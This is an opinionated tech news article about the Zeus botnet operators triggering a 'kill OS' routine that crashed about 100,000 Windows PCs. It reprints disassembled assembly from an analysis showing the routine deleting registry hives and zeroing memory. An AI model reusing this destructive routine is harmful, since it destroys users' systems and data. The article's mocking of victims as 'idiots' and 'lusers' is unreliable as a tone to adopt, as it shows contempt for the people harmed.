About | ACP | Buy Stuff | Forum | Industry Watch | Learning Curve | Search | Test Drive
Home » Industry Watch » The Technological


Zombie generals kill off the idiots.

Get It

Try It

It's being alternately called 'Windowscide', 'Microsofticide', 'Idiotcide', and 'Lusercide': the hackers controlling a Windows botnet decided to 'BSOD' 100,000 Windows computers under their control.


Most Windows trojans used in plundering banks have a built-in 'self-destruct' feature called kos ('kill operating system') but it's seldom used. Now the holders of the computers of 100,000 Windows idiots pushed the button.

The self-destruct on this 'Zeus' botnet is considered one of the most brutal and merciless. The following code isolated by S21sec shows what's done.

1. Smash the Windows Registry.
Zap HKLM/softare, HKLM/system, HKCU.

push eax
push 80000001h
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+50h]
mov esi, 80000002h
push esi
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+54h]
push esi
call ds:SHDeleteKeyA
push 3E8h
call ds:Sleep ; Sleep 1 sec
xor eax, eax
push eax
2. Smash virtual memory.
Send command 0E to pipe server, zero out memory.

push eax
push eax
push eax
mov eax, ds:buffer
push 0Eh
push dword ptr [eax+30h]
call write_read_namedpipe
push 8007h
call eax ; <--- SetErrorMode to ignore everything
xor eax, eax
mov [eax], eax
xor eax, eax ; from address 0x00000000 - 0xFFFFFFFF
loc_1: mov byte ptr [eax], 0 ; fill the memory with zeros
inc eax
jmp short loc_1

'Fraudulent and Malicious'

'Zeus just gets in the category of fraudulent and malicious', says Jorge Mieres of EvilFingers.

 The Zeus realtime zombie map. The red markers indicate the geographical locations of Windows luser clusters in the botnet.

'This is basically a trojan designed to recruit PCs zombies and phishing attacks, financial institutions, banking, social networking sites, stealing data from email authentication, FTP accounts, etc, combining techniques of scripting, exploit, among others [sic]', continues Mieres. 'It's quite dangerous if we consider that in addition to the typical actions of the malware, can be obtained by any person to deposit a certain amount of money in the account of its creators [sic].'

Mieres goes on to list a number of 'drive by' sites that can affect Windows computers. He recommends admins block these addresses at their gateway but never once considers the option to leave Windows altogether.

ZeusTracker and the Nuclear Option

'One of the scarier realities about malicious software', wrote Brian Krebs of Security Fix, 'is that these programs leave ultimate control over victim machines in the hands of the attacker who could simply decide to order all of the infected machines to self-destruct.'

On Windows that's easy: the system sports a wide open 'standalone' architecture unfit for Internet use.

'Most security experts will tell you', says Krebs, 'that while this so-called 'nuclear option' is an available feature in some malware, it is hardly ever used. Disabling infected systems is counterproductive for attackers who generally focus on hoovering as much personal and financial data as they can from the PCs they control.'

'Try telling that to Roman Hüssy, a 21 year old Swiss information technology expert who last month witnessed a collection of 100,000+ hacked Microsoft Windows systems tearing themselves apart.' Hüssy runs the ZeuS Tracker microsite. ZeuS Tracker simply devotes itself 24/7 to following this one (of many) Windows botnets and providing blocking lists.

Talk about stupid: technology devoted to protecting an operating system Bill Gates doesn't care about fixing.

The Zeus zombie generals may be intent on overthrowing the financial world but for the moment they're the masters of Internet performance art. And for the moment there may be 100,000+ fewer Windows idiots the rest of us have to deal with.

[Bill Gates, Microsoft] took systems designed for isolated desktop systems and put them on the net without thinking about evildoers.
 - Bill Joy

See Also
Hall of Monkeys: 42,011,633
The Technological: Wsnpoem
Learning Curve: Windows Workshop
The Technological: They Think It's OK
The Technological: The Microsoft Ghetto
The Technological: Department of Dummies
Learning Curve: Fighting Malware on Windows
Learning Curve: Windows Se7en: No News Here, Move On
Learning Curve: Microsoft: The Truth and the Consequences

OSNews: Botnet Kill Switch: 100,000 BSODs
[H] Enthusiast: Zeus Botnet Commits Suicide
abuse.ch: When a Botmaster Goes REALLY Mad
Security Fix: ZeusTracker and the Nuclear Option
S32sec: When a Bot Master Goes Mad - Kill the OS
EvilFingers: Zeus Botnet - Mass Propagation of Trojan Part One
EvilFingers: Zeus Botnet - Mass Propagation of Trojan Part Two
SlashGear: 100,000 Windows PCs Wiped as Malware Pulls 'Kill OS' Trigger

About | ACP | Buy Stuff | Forum | Industry Watch | Learning Curve | Search | Test Drive
Copyright © Rixstep. All rights reserved.